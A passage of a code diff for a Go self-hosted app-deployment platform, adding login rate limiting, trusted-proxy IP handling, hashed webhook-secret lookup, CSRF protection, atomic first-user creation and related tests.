+		handler.ServeHTTP(rec, req)
+	}
+
+	// IP1 should be blocked
+	req := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req.RemoteAddr = "10.0.0.1:1234"
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+	assert.Equal(t, http.StatusTooManyRequests, rec.Code)
+
+	// IP2 should still work
+	req2 := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req2.RemoteAddr = "10.0.0.2:1234"
+	rec2 := httptest.NewRecorder()
+	handler.ServeHTTP(rec2, req2)
+	assert.Equal(t, http.StatusOK, rec2.Code, "different IP should not be rate limited")
+}
+
+//nolint:paralleltest // mutates global loginLimiter
+func TestLoginRateLimitReturns429Body(t *testing.T) {
+	loginLimiter = newIPLimiter()
+
+	mw := newTestMiddleware(t)
+
+	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	// Exhaust burst
+	for range 5 {
+		req := httptest.NewRequest(http.MethodPost, "/login", nil)
+		req.RemoteAddr = "172.16.0.1:5555"
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, req)
+	}
+
+	req := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req.RemoteAddr = "172.16.0.1:5555"
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+	assert.Equal(t, http.StatusTooManyRequests, rec.Code)
+	assert.Contains(t, rec.Body.String(), "Too Many Requests")
+	assert.NotEmpty(t, rec.Header().Get("Retry-After"), "should include Retry-After header")
+}
+
+func TestIPLimiterEvictsStaleEntries(t *testing.T) {
+	t.Parallel()
+
+	il := newIPLimiter()
+
+	// Add an entry and backdate its lastSeen
+	il.mu.Lock()
+	il.limiters["1.2.3.4"] = &ipLimiterEntry{
+		limiter:  nil,
+		lastSeen: time.Now().Add(-15 * time.Minute),
+	}
+	il.limiters["5.6.7.8"] = &ipLimiterEntry{
+		limiter:  nil,
+		lastSeen: time.Now(),
+	}
+	il.mu.Unlock()
+
+	// Trigger sweep
+	il.mu.Lock()
+	il.sweep(time.Now())
+	il.mu.Unlock()
+
+	il.mu.Lock()
+	defer il.mu.Unlock()
+
+	assert.NotContains(t, il.limiters, "1.2.3.4", "stale entry should be evicted")
+	assert.Contains(t, il.limiters, "5.6.7.8", "fresh entry should remain")
+}

internal/middleware/realip_test.go

@@ -0,0 +1,157 @@
+package middleware //nolint:testpackage // tests unexported realIP function
+
+import (
+	"context"
+	"net"
+	"net/http"
+	"testing"
+)
+
+func TestRealIP(t *testing.T) { //nolint:funlen // table-driven test
+	t.Parallel()
+
+	tests := []struct {
+		name       string
+		remoteAddr string
+		xRealIP    string
+		xff        string
+		want       string
+	}{
+		// === Trusted proxy (RFC1918 / loopback) — headers ARE honoured ===
+		{
+			name:       "trusted: X-Real-IP from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xRealIP:    "203.0.113.5",
+			xff:        "198.51.100.1, 10.0.0.1",
+			want:       "203.0.113.5",
+		},
+		{
+			name:       "trusted: XFF from 10.x when no X-Real-IP",
+			remoteAddr: "10.0.0.1:1234",
+			xff:        "198.51.100.1, 10.0.0.1",
+			want:       "198.51.100.1",
+		},
+		{
+			name:       "trusted: XFF single IP from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xff:        "203.0.113.10",
+			want:       "203.0.113.10",
+		},
+		{
+			name:       "trusted: falls back to RemoteAddr (192.168.x)",
+			remoteAddr: "192.168.1.1:5678",
+			want:       "192.168.1.1",
+		},
+		{
+			name:       "trusted: RemoteAddr without port",
+			remoteAddr: "192.168.1.1",
+			want:       "192.168.1.1",
+		},
+		{
+			name:       "trusted: X-Real-IP with whitespace from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xRealIP:    "  203.0.113.5  ",
+			want:       "203.0.113.5",
+		},
+		{
+			name:       "trusted: XFF with whitespace from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xff:        "  198.51.100.1 , 10.0.0.1",
+			want:       "198.51.100.1",
+		},
+		{
+			name:       "trusted: empty X-Real-IP falls through to XFF from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xRealIP:    "  ",
+			xff:        "198.51.100.1",
+			want:       "198.51.100.1",
+		},
+		{
+			name:       "trusted: loopback honours X-Real-IP",
+			remoteAddr: "127.0.0.1:9999",
+			xRealIP:    "93.184.216.34",
+			want:       "93.184.216.34",
+		},
+		{
+			name:       "trusted: 172.16.x honours XFF",
+			remoteAddr: "172.16.0.1:4321",
+			xff:        "8.8.8.8",
+			want:       "8.8.8.8",
+		},
+
+		// === Untrusted proxy (public IP) — headers IGNORED, use RemoteAddr ===
+		{
+			name:       "untrusted: X-Real-IP ignored from public IP",
+			remoteAddr: "203.0.113.50:1234",
+			xRealIP:    "10.0.0.1",
+			want:       "203.0.113.50",
+		},
+		{
+			name:       "untrusted: XFF ignored from public IP",
+			remoteAddr: "198.51.100.99:5678",
+			xff:        "10.0.0.1, 192.168.1.1",
+			want:       "198.51.100.99",
+		},
+		{
+			name:       "untrusted: both headers ignored from public IP",
+			remoteAddr: "8.8.8.8:443",
+			xRealIP:    "1.2.3.4",
+			xff:        "5.6.7.8",
+			want:       "8.8.8.8",
+		},
+		{
+			name:       "untrusted: no headers, public RemoteAddr",
+			remoteAddr: "93.184.216.34:8080",
+			want:       "93.184.216.34",
+		},
+		{
+			name:       "untrusted: public RemoteAddr without port",
+			remoteAddr: "93.184.216.34",
+			want:       "93.184.216.34",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			req, _ := http.NewRequestWithContext(context.Background(), http.MethodGet, "/", nil)
+			req.RemoteAddr = tt.remoteAddr
+
+			if tt.xRealIP != "" {
+				req.Header.Set("X-Real-IP", tt.xRealIP)
+			}
+
+			if tt.xff != "" {
+				req.Header.Set("X-Forwarded-For", tt.xff)
+			}
+
+			got := realIP(req)
+			if got != tt.want {
+				t.Errorf("realIP() = %q, want %q", got, tt.want)
+			}
+		})
+	}
+}
+
+func TestIsTrustedProxy(t *testing.T) {
+	t.Parallel()
+
+	trusted := []string{"10.0.0.1", "10.255.255.255", "172.16.0.1", "172.31.255.255",
+		"192.168.0.1", "192.168.255.255", "127.0.0.1", "127.255.255.255", "::1"}
+	untrusted := []string{"8.8.8.8", "203.0.113.1", "172.32.0.1", "11.0.0.1", "2001:db8::1"}
+
+	for _, addr := range trusted {
+		ip := net.ParseIP(addr)
+		if !isTrustedProxy(ip) {
+			t.Errorf("expected %s to be trusted", addr)
+		}
+	}
+
+	for _, addr := range untrusted {
+		ip := net.ParseIP(addr)
+		if isTrustedProxy(ip) {
+			t.Errorf("expected %s to be untrusted", addr)
+		}
+	}
+}

internal/models/app.go

@@ -10,6 +10,12 @@ import (
 	"git.eeqj.de/sneak/upaas/internal/database"
 )
 
+// appColumns is the standard column list for app queries.
+const appColumns = `id, name, repo_url, branch, dockerfile_path, webhook_secret,
+			ssh_private_key, ssh_public_key, image_id, status,
+			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash,
+			previous_image_id, created_at, updated_at`
+
 // AppStatus represents the status of an app.
 type AppStatus string
 
@@ -26,21 +32,23 @@ const (
 type App struct {
 	db *database.Database
 
-	ID             string
+	ID                string
-	Name           string
+	Name              string
-	RepoURL        string
+	RepoURL           string
-	Branch         string
+	Branch            string
-	DockerfilePath string
+	DockerfilePath    string
-	WebhookSecret  string
+	WebhookSecret     string
-	SSHPrivateKey  string
+	WebhookSecretHash string
-	SSHPublicKey   string
+	SSHPrivateKey     string
-	ImageID        sql.NullString
+	SSHPublicKey      string
-	Status         AppStatus
+	ImageID           sql.NullString
-	DockerNetwork  sql.NullString
+	PreviousImageID   sql.NullString
-	NtfyTopic      sql.NullString
+	Status            AppStatus
-	SlackWebhook   sql.NullString
+	DockerNetwork     sql.NullString
-	CreatedAt      time.Time
+	NtfyTopic         sql.NullString
-	UpdatedAt      time.Time
+	SlackWebhook      sql.NullString
+	CreatedAt         time.Time
+	UpdatedAt         time.Time
 }
 
 // NewApp creates a new App with a database reference.
@@ -70,11 +78,8 @@ func (a *App) Delete(ctx context.Context) error {
 
 // Reload refreshes the app from the database.
 func (a *App) Reload(ctx context.Context) error {
-	row := a.db.QueryRow(ctx, `
+	row := a.db.QueryRow(ctx,
-		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
+		"SELECT "+appColumns+" FROM apps WHERE id = ?",
-			ssh_private_key, ssh_public_key, image_id, status,
-			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
-		FROM apps WHERE id = ?`,
 		a.ID,
 	)
 
@@ -136,13 +141,15 @@ func (a *App) insert(ctx context.Context) error {
 		INSERT INTO apps (
 			id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
-			docker_network, ntfy_topic, slack_webhook
+			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash,
-		) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`
+			previous_image_id
+		) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`
 
 	_, err := a.db.Exec(ctx, query,
 		a.ID, a.Name, a.RepoURL, a.Branch, a.DockerfilePath, a.WebhookSecret,
 		a.SSHPrivateKey, a.SSHPublicKey, a.ImageID, a.Status,
-		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook,
+		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook, a.WebhookSecretHash,
+		a.PreviousImageID,
 	)
 	if err != nil {
 		return err
@@ -157,6 +164,7 @@ func (a *App) update(ctx context.Context) error {
 			name = ?, repo_url = ?, branch = ?, dockerfile_path = ?,
 			image_id = ?, status = ?,
 			docker_network = ?, ntfy_topic = ?, slack_webhook = ?,
+			previous_image_id = ?,
 			updated_at = CURRENT_TIMESTAMP
 		WHERE id = ?`
 
@@ -164,6 +172,7 @@ func (a *App) update(ctx context.Context) error {
 		a.Name, a.RepoURL, a.Branch, a.DockerfilePath,
 		a.ImageID, a.Status,
 		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook,
+		a.PreviousImageID,
 		a.ID,
 	)
 
@@ -177,6 +186,8 @@ func (a *App) scan(row *sql.Row) error {
 		&a.SSHPrivateKey, &a.SSHPublicKey,
 		&a.ImageID, &a.Status,
 		&a.DockerNetwork, &a.NtfyTopic, &a.SlackWebhook,
+		&a.WebhookSecretHash,
+		&a.PreviousImageID,
 		&a.CreatedAt, &a.UpdatedAt,
 	)
 }
@@ -193,6 +204,8 @@ func scanApps(appDB *database.Database, rows *sql.Rows) ([]*App, error) {
 			&app.SSHPrivateKey, &app.SSHPublicKey,
 			&app.ImageID, &app.Status,
 			&app.DockerNetwork, &app.NtfyTopic, &app.SlackWebhook,
+			&app.WebhookSecretHash,
+			&app.PreviousImageID,
 			&app.CreatedAt, &app.UpdatedAt,
 		)
 		if scanErr != nil {
@@ -221,11 +234,8 @@ func FindApp(
 	app := NewApp(appDB)
 	app.ID = appID
 
-	row := appDB.QueryRow(ctx, `
+	row := appDB.QueryRow(ctx,
-		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
+		"SELECT "+appColumns+" FROM apps WHERE id = ?",
-			ssh_private_key, ssh_public_key, image_id, status,
-			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
-		FROM apps WHERE id = ?`,
 		appID,
 	)
 
@@ -241,7 +251,8 @@ func FindApp(
 	return app, nil
 }
 
-// FindAppByWebhookSecret finds an app by webhook secret.
+// FindAppByWebhookSecret finds an app by webhook secret using a SHA-256 hash
+// lookup. This avoids SQL string comparison timing side-channels.
 //
 //nolint:nilnil // returning nil,nil is idiomatic for "not found" in Active Record
 func FindAppByWebhookSecret(
@@ -250,13 +261,11 @@ func FindAppByWebhookSecret(
 	secret string,
 ) (*App, error) {
 	app := NewApp(appDB)
+	secretHash := database.HashWebhookSecret(secret)
 
-	row := appDB.QueryRow(ctx, `
+	row := appDB.QueryRow(ctx,
-		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
+		"SELECT "+appColumns+" FROM apps WHERE webhook_secret_hash = ?",
-			ssh_private_key, ssh_public_key, image_id, status,
+		secretHash,
-			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
-		FROM apps WHERE webhook_secret = ?`,
-		secret,
 	)
 
 	err := app.scan(row)
@@ -273,11 +282,8 @@ func FindAppByWebhookSecret(
 
 // AllApps returns all apps ordered by name.
 func AllApps(ctx context.Context, appDB *database.Database) ([]*App, error) {
-	rows, err := appDB.Query(ctx, `
+	rows, err := appDB.Query(ctx,
-		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
+		"SELECT "+appColumns+" FROM apps ORDER BY name",
-			ssh_private_key, ssh_public_key, image_id, status,
-			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
-		FROM apps ORDER BY name`,
 	)
 	if err != nil {
 		return nil, fmt.Errorf("querying all apps: %w", err)

internal/models/deployment.go

@@ -5,6 +5,7 @@ import (
 	"database/sql"
 	"errors"
 	"fmt"
+	"strings"
 	"time"
 
 	"git.eeqj.de/sneak/upaas/internal/database"
@@ -19,6 +20,7 @@ const (
 	DeploymentStatusDeploying DeploymentStatus = "deploying"
 	DeploymentStatusSuccess   DeploymentStatus = "success"
 	DeploymentStatusFailed    DeploymentStatus = "failed"
+	DeploymentStatusCancelled DeploymentStatus = "cancelled"
 )
 
 // Display constants.
@@ -75,7 +77,11 @@ func (d *Deployment) Reload(ctx context.Context) error {
 	return d.scan(row)
 }
 
+// maxLogSize is the maximum size of deployment logs stored in the database (1MB).
+const maxLogSize = 1 << 20
+
 // AppendLog appends a log line to the deployment logs.
+// If the total log size exceeds maxLogSize, the oldest lines are truncated.
 func (d *Deployment) AppendLog(ctx context.Context, line string) error {
 	var currentLogs string
 
@@ -83,7 +89,22 @@ func (d *Deployment) AppendLog(ctx context.Context, line string) error {
 		currentLogs = d.Logs.String
 	}
 
-	d.Logs = sql.NullString{String: currentLogs + line + "\n", Valid: true}
+	newLogs := currentLogs + line + "\n"
+
+	if len(newLogs) > maxLogSize {
+		// Keep the most recent logs that fit within the limit.
+		// Find a newline after the truncation point to avoid partial lines.
+		truncateAt := len(newLogs) - maxLogSize
+		idx := strings.Index(newLogs[truncateAt:], "\n")
+
+		if idx >= 0 {
+			newLogs = "[earlier logs truncated]\n" + newLogs[truncateAt+idx+1:]
+		} else {
+			newLogs = "[earlier logs truncated]\n" + newLogs[truncateAt:]
+		}
+	}
+
+	d.Logs = sql.NullString{String: newLogs, Valid: true}
 
 	return d.Save(ctx)
 }

internal/models/models_test.go

@@ -297,6 +297,7 @@ func TestAllApps(t *testing.T) {
 			app.Branch = testBranch
 			app.DockerfilePath = "Dockerfile"
 			app.WebhookSecret = "secret-" + strconv.Itoa(idx)
+			app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 			app.SSHPrivateKey = "private"
 			app.SSHPublicKey = "public"
 
@@ -791,6 +792,7 @@ func createTestApp(t *testing.T, testDB *database.Database) *models.App {
 	app.Branch = testBranch
 	app.DockerfilePath = "Dockerfile"
 	app.WebhookSecret = "secret-" + t.Name()
+	app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 	app.SSHPrivateKey = "private"
 	app.SSHPublicKey = "public"
 

internal/models/user.go

@@ -135,6 +135,61 @@ func FindUserByUsername(
 	return user, nil
 }
 
+// CreateFirstUser atomically checks that no users exist and inserts the admin user.
+// Returns nil, nil if a user already exists (setup already completed).
+func CreateFirstUser(
+	ctx context.Context,
+	db *database.Database,
+	username, passwordHash string,
+) (*User, error) {
+	tx, err := db.BeginTx(ctx, nil)
+	if err != nil {
+		return nil, fmt.Errorf("beginning transaction: %w", err)
+	}
+
+	defer func() { _ = tx.Rollback() }()
+
+	// Check if any user exists within the transaction.
+	var count int
+
+	err = tx.QueryRowContext(ctx, "SELECT COUNT(*) FROM users").Scan(&count)
+	if err != nil {
+		return nil, fmt.Errorf("checking user count: %w", err)
+	}
+
+	if count > 0 {
+		return nil, nil //nolint:nilnil // nil,nil signals setup already completed
+	}
+
+	result, err := tx.ExecContext(ctx,
+		"INSERT INTO users (username, password_hash) VALUES (?, ?)",
+		username, passwordHash,
+	)
+	if err != nil {
+		return nil, fmt.Errorf("inserting user: %w", err)
+	}
+
+	err = tx.Commit()
+	if err != nil {
+		return nil, fmt.Errorf("committing transaction: %w", err)
+	}
+
+	insertID, err := result.LastInsertId()
+	if err != nil {
+		return nil, fmt.Errorf("getting last insert id: %w", err)
+	}
+
+	user := NewUser(db)
+	user.ID = insertID
+
+	err = user.Reload(ctx)
+	if err != nil {
+		return nil, fmt.Errorf("reloading user: %w", err)
+	}
+
+	return user, nil
+}
+
 // UserExists checks if any user exists in the database.
 func UserExists(ctx context.Context, db *database.Database) (bool, error) {
 	var count int

internal/server/routes.go

@@ -37,59 +37,86 @@ func (s *Server) SetupRoutes() {
 		http.FileServer(http.FS(static.Static)),
 	))
 
-	// Public routes
+	// Webhook endpoint (uses secret for auth, not session — no CSRF)
-	s.router.Get("/login", s.handlers.HandleLoginGET())
-	s.router.Post("/login", s.handlers.HandleLoginPOST())
-	s.router.Get("/setup", s.handlers.HandleSetupGET())
-	s.router.Post("/setup", s.handlers.HandleSetupPOST())
-
-	// Webhook endpoint (uses secret for auth, not session)
 	s.router.Post("/webhook/{secret}", s.handlers.HandleWebhook())
 
-	// Protected routes (require session auth)
+	// All HTML-serving routes get CSRF protection
 	s.router.Group(func(r chi.Router) {
-		r.Use(s.mw.SessionAuth())
+		r.Use(s.mw.CSRF())
 
-		// Dashboard
+		// Public routes
-		r.Get("/", s.handlers.HandleDashboard())
+		r.Get("/login", s.handlers.HandleLoginGET())
+		r.With(s.mw.LoginRateLimit()).Post("/login", s.handlers.HandleLoginPOST())
+		r.Get("/setup", s.handlers.HandleSetupGET())
+		r.Post("/setup", s.handlers.HandleSetupPOST())
 
-		// Logout
+		// Protected routes (require session auth)
-		r.Post("/logout", s.handlers.HandleLogout())
+		r.Group(func(r chi.Router) {
+			r.Use(s.mw.SessionAuth())
 
-		// App routes
+			// Dashboard
-		r.Get("/apps/new", s.handlers.HandleAppNew())
+			r.Get("/", s.handlers.HandleDashboard())
-		r.Post("/apps", s.handlers.HandleAppCreate())
-		r.Get("/apps/{id}", s.handlers.HandleAppDetail())
-		r.Get("/apps/{id}/edit", s.handlers.HandleAppEdit())
-		r.Post("/apps/{id}", s.handlers.HandleAppUpdate())
-		r.Post("/apps/{id}/delete", s.handlers.HandleAppDelete())
-		r.Post("/apps/{id}/deploy", s.handlers.HandleAppDeploy())
-		r.Get("/apps/{id}/deployments", s.handlers.HandleAppDeployments())
-		r.Get("/apps/{id}/deployments/{deploymentID}/logs", s.handlers.HandleDeploymentLogsAPI())
-		r.Get("/apps/{id}/deployments/{deploymentID}/download", s.handlers.HandleDeploymentLogDownload())
-		r.Get("/apps/{id}/logs", s.handlers.HandleAppLogs())
-		r.Get("/apps/{id}/container-logs", s.handlers.HandleContainerLogsAPI())
-		r.Get("/apps/{id}/status", s.handlers.HandleAppStatusAPI())
-		r.Get("/apps/{id}/recent-deployments", s.handlers.HandleRecentDeploymentsAPI())
-		r.Post("/apps/{id}/restart", s.handlers.HandleAppRestart())
-		r.Post("/apps/{id}/stop", s.handlers.HandleAppStop())
-		r.Post("/apps/{id}/start", s.handlers.HandleAppStart())
 
-		// Environment variables
+			// Logout
-		r.Post("/apps/{id}/env-vars", s.handlers.HandleEnvVarAdd())
+			r.Post("/logout", s.handlers.HandleLogout())
-		r.Post("/apps/{id}/env-vars/{varID}/delete", s.handlers.HandleEnvVarDelete())
 
-		// Labels
+			// App routes
-		r.Post("/apps/{id}/labels", s.handlers.HandleLabelAdd())
+			r.Get("/apps/new", s.handlers.HandleAppNew())
-		r.Post("/apps/{id}/labels/{labelID}/delete", s.handlers.HandleLabelDelete())
+			r.Post("/apps", s.handlers.HandleAppCreate())
+			r.Get("/apps/{id}", s.handlers.HandleAppDetail())
+			r.Get("/apps/{id}/edit", s.handlers.HandleAppEdit())
+			r.Post("/apps/{id}", s.handlers.HandleAppUpdate())
+			r.Post("/apps/{id}/delete", s.handlers.HandleAppDelete())
+			r.Post("/apps/{id}/deploy", s.handlers.HandleAppDeploy())
+			r.Post("/apps/{id}/deployments/cancel", s.handlers.HandleCancelDeploy())
+			r.Get("/apps/{id}/deployments", s.handlers.HandleAppDeployments())
+			r.Get("/apps/{id}/deployments/{deploymentID}/logs", s.handlers.HandleDeploymentLogsAPI())
+			r.Get("/apps/{id}/deployments/{deploymentID}/download", s.handlers.HandleDeploymentLogDownload())
+			r.Get("/apps/{id}/logs", s.handlers.HandleAppLogs())
+			r.Get("/apps/{id}/container-logs", s.handlers.HandleContainerLogsAPI())
+			r.Get("/apps/{id}/status", s.handlers.HandleAppStatusAPI())
+			r.Get("/apps/{id}/recent-deployments", s.handlers.HandleRecentDeploymentsAPI())
+			r.Post("/apps/{id}/rollback", s.handlers.HandleAppRollback())
+			r.Post("/apps/{id}/restart", s.handlers.HandleAppRestart())
+			r.Post("/apps/{id}/stop", s.handlers.HandleAppStop())
+			r.Post("/apps/{id}/start", s.handlers.HandleAppStart())
 
-		// Volumes
+			// Environment variables
-		r.Post("/apps/{id}/volumes", s.handlers.HandleVolumeAdd())
+			r.Post("/apps/{id}/env-vars", s.handlers.HandleEnvVarAdd())
-		r.Post("/apps/{id}/volumes/{volumeID}/delete", s.handlers.HandleVolumeDelete())
+			r.Post("/apps/{id}/env-vars/{varID}/edit", s.handlers.HandleEnvVarEdit())
+			r.Post("/apps/{id}/env-vars/{varID}/delete", s.handlers.HandleEnvVarDelete())
 
-		// Ports
+			// Labels
-		r.Post("/apps/{id}/ports", s.handlers.HandlePortAdd())
+			r.Post("/apps/{id}/labels", s.handlers.HandleLabelAdd())
-		r.Post("/apps/{id}/ports/{portID}/delete", s.handlers.HandlePortDelete())
+			r.Post("/apps/{id}/labels/{labelID}/edit", s.handlers.HandleLabelEdit())
+			r.Post("/apps/{id}/labels/{labelID}/delete", s.handlers.HandleLabelDelete())
+
+			// Volumes
+			r.Post("/apps/{id}/volumes", s.handlers.HandleVolumeAdd())
+			r.Post("/apps/{id}/volumes/{volumeID}/edit", s.handlers.HandleVolumeEdit())
+			r.Post("/apps/{id}/volumes/{volumeID}/delete", s.handlers.HandleVolumeDelete())
+
+			// Ports
+			r.Post("/apps/{id}/ports", s.handlers.HandlePortAdd())
+			r.Post("/apps/{id}/ports/{portID}/delete", s.handlers.HandlePortDelete())
+		})
+	})
+
+	// API v1 routes (cookie-based session auth, no CSRF)
+	s.router.Route("/api/v1", func(r chi.Router) {
+		// Login endpoint is public (returns session cookie)
+		r.With(s.mw.LoginRateLimit()).Post("/login", s.handlers.HandleAPILoginPOST())
+
+		// All other API routes require session auth
+		r.Group(func(r chi.Router) {
+			r.Use(s.mw.APISessionAuth())
+
+			r.Get("/whoami", s.handlers.HandleAPIWhoAmI())
+
+			r.Get("/apps", s.handlers.HandleAPIListApps())
+			r.Get("/apps/{id}", s.handlers.HandleAPIGetApp())
+			r.Get("/apps/{id}/deployments", s.handlers.HandleAPIListDeployments())
+		})
 	})
 
 	// Metrics endpoint (optional, with basic auth)

internal/service/app/app.go

@@ -11,6 +11,7 @@ import (
 
 	"github.com/google/uuid"
 	"github.com/oklog/ulid/v2"
+
 	"go.uber.org/fx"
 
 	"git.eeqj.de/sneak/upaas/internal/database"
@@ -82,6 +83,7 @@ func (svc *Service) CreateApp(
 	}
 
 	app.WebhookSecret = uuid.New().String()
+	app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 	app.SSHPrivateKey = keyPair.PrivateKey
 	app.SSHPublicKey = keyPair.PublicKey
 	app.Status = models.AppStatusPending

internal/service/auth/auth.go

@@ -10,7 +10,6 @@ import (
 	"log/slog"
 	"net/http"
 	"strings"
-	"time"
 
 	"github.com/gorilla/sessions"
 	"go.uber.org/fx"
@@ -73,6 +72,7 @@ func New(_ fx.Lifecycle, params ServiceParams) (*Service, error) {
 		Path:     "/",
 		MaxAge:   sessionMaxAgeSeconds,
 		HttpOnly: true,
+		Secure:   !params.Config.Debug,
 		SameSite: http.SameSiteLaxMode,
 	}
 
@@ -162,34 +162,27 @@ func (svc *Service) IsSetupRequired(ctx context.Context) (bool, error) {
 }
 
 // CreateUser creates the initial admin user.
+// It uses a DB transaction to atomically check that no users exist and insert
+// the new admin user, preventing race conditions from concurrent setup requests.
 func (svc *Service) CreateUser(
 	ctx context.Context,
 	username, password string,
 ) (*models.User, error) {
-	// Check if user already exists
+	// Hash password before starting transaction.
-	exists, err := models.UserExists(ctx, svc.db)
-	if err != nil {
-		return nil, fmt.Errorf("failed to check if user exists: %w", err)
-	}
-
-	if exists {
-		return nil, ErrUserExists
-	}
-
-	// Hash password
 	hash, err := svc.HashPassword(password)
 	if err != nil {
 		return nil, fmt.Errorf("failed to hash password: %w", err)
 	}
 
-	// Create user
+	// Use a transaction so the "no users exist" check and the insert are atomic.
-	user := models.NewUser(svc.db)
+	// SQLite serializes write transactions, so concurrent requests will block here.
-	user.Username = username
+	user, err := models.CreateFirstUser(ctx, svc.db, username, hash)
-	user.PasswordHash = hash
-
-	err = user.Save(ctx)
 	if err != nil {
-		return nil, fmt.Errorf("failed to save user: %w", err)
+		return nil, fmt.Errorf("failed to create user: %w", err)
+	}
+
+	if user == nil {
+		return nil, ErrUserExists
 	}
 
 	svc.log.Info("user created", "username", username)
@@ -275,7 +268,7 @@ func (svc *Service) DestroySession(
 		return fmt.Errorf("failed to get session: %w", err)
 	}
 
-	session.Options.MaxAge = -1 * int(time.Second)
+	session.Options.MaxAge = -1
 
 	saveErr := session.Save(request, respWriter)
 	if saveErr != nil {

internal/service/auth/auth_test.go

@@ -2,6 +2,9 @@ package auth_test
 
 import (
 	"context"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
 	"path/filepath"
 	"testing"
 
@@ -68,6 +71,83 @@ func setupTestService(t *testing.T) (*auth.Service, func()) {
 	return svc, cleanup
 }
 
+func setupAuthService(t *testing.T, debug bool) *auth.Service {
+	t.Helper()
+
+	tmpDir := t.TempDir()
+
+	globals.SetAppname("upaas-test")
+	globals.SetVersion("test")
+
+	globalsInst, err := globals.New(fx.Lifecycle(nil))
+	require.NoError(t, err)
+
+	loggerInst, err := logger.New(
+		fx.Lifecycle(nil),
+		logger.Params{Globals: globalsInst},
+	)
+	require.NoError(t, err)
+
+	cfg := &config.Config{
+		Port:          8080,
+		DataDir:       tmpDir,
+		SessionSecret: "test-secret-key-at-least-32-chars",
+		Debug:         debug,
+	}
+
+	dbInst, err := database.New(fx.Lifecycle(nil), database.Params{
+		Logger: loggerInst,
+		Config: cfg,
+	})
+	require.NoError(t, err)
+
+	svc, err := auth.New(fx.Lifecycle(nil), auth.ServiceParams{
+		Logger:   loggerInst,
+		Config:   cfg,
+		Database: dbInst,
+	})
+	require.NoError(t, err)
+
+	return svc
+}
+
+func getSessionCookie(t *testing.T, svc *auth.Service) *http.Cookie {
+	t.Helper()
+
+	_, err := svc.CreateUser(context.Background(), "admin", "password123")
+	require.NoError(t, err)
+
+	user, err := svc.Authenticate(context.Background(), "admin", "password123")
+	require.NoError(t, err)
+
+	recorder := httptest.NewRecorder()
+	request := httptest.NewRequest(http.MethodGet, "/", nil)
+
+	err = svc.CreateSession(recorder, request, user)
+	require.NoError(t, err)
+
+	for _, c := range recorder.Result().Cookies() {
+		if c.Name == "upaas_session" {
+			return c
+		}
+	}
+
+	return nil
+}
+
+func TestSessionCookieSecureFlag(testingT *testing.T) {
+	testingT.Parallel()
+
+	testingT.Run("secure flag is true when debug is false", func(t *testing.T) {
+		t.Parallel()
+
+		svc := setupAuthService(t, false)
+		cookie := getSessionCookie(t, svc)
+		require.NotNil(t, cookie, "session cookie should exist")
+		assert.True(t, cookie.Secure, "session cookie should have Secure flag in production mode")
+	})
+}
+
 func TestHashPassword(testingT *testing.T) {
 	testingT.Parallel()
 
@@ -200,6 +280,54 @@ func TestCreateUser(testingT *testing.T) {
 	})
 }
 
+func TestCreateUserRaceCondition(testingT *testing.T) {
+	testingT.Parallel()
+
+	testingT.Run("concurrent setup requests create only one user", func(t *testing.T) {
+		t.Parallel()
+
+		svc, cleanup := setupTestService(t)
+		defer cleanup()
+
+		const goroutines = 10
+
+		results := make(chan error, goroutines)
+		start := make(chan struct{})
+
+		for i := range goroutines {
+			go func(idx int) {
+				<-start // Wait for all goroutines to be ready
+
+				_, err := svc.CreateUser(
+					context.Background(),
+					fmt.Sprintf("admin%d", idx),
+					"password123456",
+				)
+				results <- err
+			}(i)
+		}
+
+		// Release all goroutines simultaneously
+		close(start)
+
+		var successes, failures int
+
+		for range goroutines {
+			err := <-results
+			if err == nil {
+				successes++
+			} else {
+				require.ErrorIs(t, err, auth.ErrUserExists)
+
+				failures++
+			}
+		}
+
+		assert.Equal(t, 1, successes, "exactly one goroutine should succeed")
+		assert.Equal(t, goroutines-1, failures, "all other goroutines should fail with ErrUserExists")
+	})
+}
+
 func TestAuthenticate(testingT *testing.T) {
 	testingT.Parallel()
 
@@ -241,3 +369,38 @@ func TestAuthenticate(testingT *testing.T) {
 		assert.ErrorIs(t, err, auth.ErrInvalidCredentials)
 	})
 }
+
+func TestDestroySessionMaxAge(testingT *testing.T) {
+	testingT.Parallel()
+
+	testingT.Run("sets MaxAge to exactly -1", func(t *testing.T) {
+		t.Parallel()
+
+		svc, cleanup := setupTestService(t)
+		defer cleanup()
+
+		recorder := httptest.NewRecorder()
+		request := httptest.NewRequest(http.MethodGet, "/", nil)
+
+		err := svc.DestroySession(recorder, request)
